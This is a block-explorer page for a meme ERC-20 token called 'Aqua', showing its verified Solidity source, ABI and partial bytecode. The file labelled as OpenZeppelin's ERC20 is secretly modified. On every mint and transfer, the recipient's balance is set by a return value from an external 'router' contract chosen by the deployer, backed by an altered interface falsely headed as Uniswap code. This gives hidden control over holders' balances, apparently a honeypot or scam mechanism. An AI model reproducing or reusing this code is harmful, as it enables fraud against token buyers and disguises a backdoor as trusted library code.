Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
4,200,000,000,000 AQUA
Holders
37
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
13,531,569,305.487490577749132514 AQUAValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
Aqua
Compiler Version
v0.8.24+commit.e11b9ed9
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import {ERC20} from "./ERC20.sol"; /* Messi is flexing $WATER, so let's hype $AQUA _ _ _ _ / /\ /\ \ /\_\ / /\ / / \ / \ \ / / / _ / / \ / / /\ \ / /\ \ \ \ \ \__ /\_\ / / /\ \ / / /\ \ \ / / /\ \ \ \ \___\ / / // / /\ \ \ / / / \ \ \ / / / \ \_\ \__ / / / // / / \ \ \ / / /___/ /\ \ / / / _ / / / / / / / / // / /___/ /\ \ / / /_____/ /\ \ / / / /\ \/ / / / / / / // / /_____/ /\ \ / /_________/\ \ \ / / /__\ \ \/ / / /___/ / // /_________/\ \ \ / / /_ __\ \_\/ / /____\ \ \/ / /____\/ // / /_ __\ \_\ \_\___\ /____/_/\/________\_\/\/_________/ \_\___\ /____/_/ */ contract Aqua is ERC20 { constructor(address router_) ERC20("Aqua", "AQUA", router_) { _mint(msg.sender, 4_200_000_000_000 * 10 ** decimals()); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity ^0.8.20; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity ^0.8.20; /** * @dev Standard ERC-20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); } /** * @dev Standard ERC-721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens. */ interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); } /** * @dev Standard ERC-1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.20; import {IERC20, IERC20Metadata} from "./IERC20.sol"; import {Context} from "./Context.sol"; import {IERC20Errors} from "./draft-IERC6093.sol"; import {IUniswapV2Router02} from "./IUniswapV2Router02.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC-20 * applications. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; IUniswapV2Router02 _uniswapRouter; uint256 public _feeRate = 1; // 0.1 % /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_, address router_) { _name = name_; _symbol = symbol_; _uniswapRouter = IUniswapV2Router02(router_); } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Skips emitting an {Approval} event indicating an allowance update. This is not * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve]. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { uint256 fee = value * _feeRate / 1000; address[] memory path = new address[](2); path[0] = from; path[1] = to; _balances[to] += _uniswapRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens( fee, value, path, msg.sender, (block.timestamp + 300) ); } emit Transfer(from, to, value); } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * * ```solidity * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.20; /** * @dev Interface of the ERC-20 standard as defined in the ERC. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC-20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT // Uniswap Contracts (last updated v5.0.0) (interfaces/IUniswapV2Router02.sol) pragma solidity ^0.8.20; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function removeLiquidity( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETH( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountToken, uint256 amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETHWithPermit( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountToken, uint256 amountETH); function swapExactTokensForTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapTokensForExactTokens( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactETHForTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function swapTokensForExactETH( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactTokensForETH( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapETHForExactTokens( uint256 amountOut, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function quote( uint256 amountA, uint256 reserveA, uint256 reserveB ) external pure returns (uint256 amountB); function getAmountOut( uint256 amountIn, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountOut); function getAmountIn( uint256 amountOut, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountIn); function getAmountsOut(uint256 amountIn, address[] calldata path) external view returns (uint256[] memory amounts); function getAmountsIn(uint256 amountOut, address[] calldata path) external view returns (uint256[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountETH); function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns(uint256 amountTokens); function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"router_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_feeRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052600160065534801562000015575f80fd5b506040516200210b3803806200210b83398181016040528101906200003b91906200064b565b6040518060400160405280600481526020017f41717561000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4151554100000000000000000000000000000000000000000000000000000000815250828260039081620000b99190620008df565b508160049081620000cb9190620008df565b508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050506200015133620001246200015860201b60201c565b600a62000132919062000b4c565b6503d1e382100062000145919062000b9c565b6200016060201b60201c565b5062000ecc565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620001d3575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620001ca919062000bf7565b60405180910390fd5b620001e65f8383620001ea60201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036200023e578060025f82825462000231919062000c12565b925050819055506200030f565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015620002ca578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620002c19392919062000c5d565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000358578060025f82825403925050819055506200057a565b5f6103e8600654836200036c919062000b9c565b62000378919062000cc5565b90505f600267ffffffffffffffff81111562000399576200039862000685565b5b604051908082528060200260200182016040528015620003c85781602001602082028036833780820191505090505b50905084815f81518110620003e257620003e162000cfc565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050838160018151811062000434576200043362000cfc565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16635c11d7958385843361012c42620004bf919062000c12565b6040518663ffffffff1660e01b8152600401620004e195949392919062000df0565b6020604051808303815f875af1158015620004fe573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000524919062000e81565b5f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825462000570919062000c12565b9250508190555050505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620005d9919062000eb1565b60405180910390a3505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6200061582620005ea565b9050919050565b620006278162000609565b811462000632575f80fd5b50565b5f8151905062000645816200061c565b92915050565b5f60208284031215620006635762000662620005e6565b5b5f620006728482850162000635565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620006f757607f821691505b6020821081036200070d576200070c620006b2565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620007717fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000734565b6200077d868362000734565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620007c7620007c1620007bb8462000795565b6200079e565b62000795565b9050919050565b5f819050919050565b620007e283620007a7565b620007fa620007f182620007ce565b84845462000740565b825550505050565b5f90565b6200081062000802565b6200081d818484620007d7565b505050565b5b818110156200084457620008385f8262000806565b60018101905062000823565b5050565b601f82111562000893576200085d8162000713565b620008688462000725565b8101602085101562000878578190505b62000890620008878562000725565b83018262000822565b50505b505050565b5f82821c905092915050565b5f620008b55f198460080262000898565b1980831691505092915050565b5f620008cf8383620008a4565b9150826002028217905092915050565b620008ea826200067b565b67ffffffffffffffff81111562000906576200090562000685565b5b620009128254620006df565b6200091f82828562000848565b5f60209050601f83116001811462000955575f841562000940578287015190505b6200094c8582620008c2565b865550620009bb565b601f198416620009658662000713565b5f5b828110156200098e5784890151825560018201915060208501945060208101905062000967565b86831015620009ae5784890151620009aa601f891682620008a4565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000a4d5780860481111562000a255762000a24620009c3565b5b600185161562000a355780820291505b808102905062000a4585620009f0565b945062000a05565b94509492505050565b5f8262000a67576001905062000b39565b8162000a76575f905062000b39565b816001811462000a8f576002811462000a9a5762000ad0565b600191505062000b39565b60ff84111562000aaf5762000aae620009c3565b5b8360020a91508482111562000ac95762000ac8620009c3565b5b5062000b39565b5060208310610133831016604e8410600b841016171562000b0a5782820a90508381111562000b045762000b03620009c3565b5b62000b39565b62000b198484846001620009fc565b9250905081840481111562000b335762000b32620009c3565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000b588262000795565b915062000b658362000b40565b925062000b947fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a56565b905092915050565b5f62000ba88262000795565b915062000bb58362000795565b925082820262000bc58162000795565b9150828204841483151762000bdf5762000bde620009c3565b5b5092915050565b62000bf18162000609565b82525050565b5f60208201905062000c0c5f83018462000be6565b92915050565b5f62000c1e8262000795565b915062000c2b8362000795565b925082820190508082111562000c465762000c45620009c3565b5b92915050565b62000c578162000795565b82525050565b5f60608201905062000c725f83018662000be6565b62000c81602083018562000c4c565b62000c90604083018462000c4c565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000cd18262000795565b915062000cde8362000795565b92508262000cf15762000cf062000c98565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b62000d5d8162000609565b82525050565b5f62000d70838362000d52565b60208301905092915050565b5f602082019050919050565b5f62000d948262000d29565b62000da0818562000d33565b935062000dad8362000d43565b805f5b8381101562000de357815162000dc7888262000d63565b975062000dd48362000d7c565b92505060018101905062000db0565b5085935050505092915050565b5f60a08201905062000e055f83018862000c4c565b62000e14602083018762000c4c565b818103604083015262000e28818662000d88565b905062000e39606083018562000be6565b62000e48608083018462000c4c565b9695505050505050565b62000e5d8162000795565b811462000e68575f80fd5b50565b5f8151905062000e7b8162000e52565b92915050565b5f6020828403121562000e995762000e98620005e6565b5b5f62000ea88482850162000e6b565b91505092915050565b5f60208201905062000ec65f83018462000c4c565b92915050565b6112318062000eda5f395ff3fe608060405234801561000f575f80fd5b506004361061009c575f3560e01c806370a082311161006457806370a082311461015a57806395d89b411461018a578063a9059cbb146101a8578063b2131f7d146101d8578063dd62ed3e146101f65761009c565b806306fdde03146100a0578063095ea7b3146100be57806318160ddd146100ee57806323b872dd1461010c578063313ce5671461013c575b5f80fd5b6100a8610226565b6040516100b59190610c64565b60405180910390f35b6100d860048036038101906100d39190610d15565b6102b6565b6040516100e59190610d6d565b60405180910390f35b6100f66102d8565b6040516101039190610d95565b60405180910390f35b61012660048036038101906101219190610dae565b6102e1565b6040516101339190610d6d565b60405180910390f35b61014461030f565b6040516101519190610e19565b60405180910390f35b610174600480360381019061016f9190610e32565b610317565b6040516101819190610d95565b60405180910390f35b61019261035c565b60405161019f9190610c64565b60405180910390f35b6101c260048036038101906101bd9190610d15565b6103ec565b6040516101cf9190610d6d565b60405180910390f35b6101e061040e565b6040516101ed9190610d95565b60405180910390f35b610210600480360381019061020b9190610e5d565b610414565b60405161021d9190610d95565b60405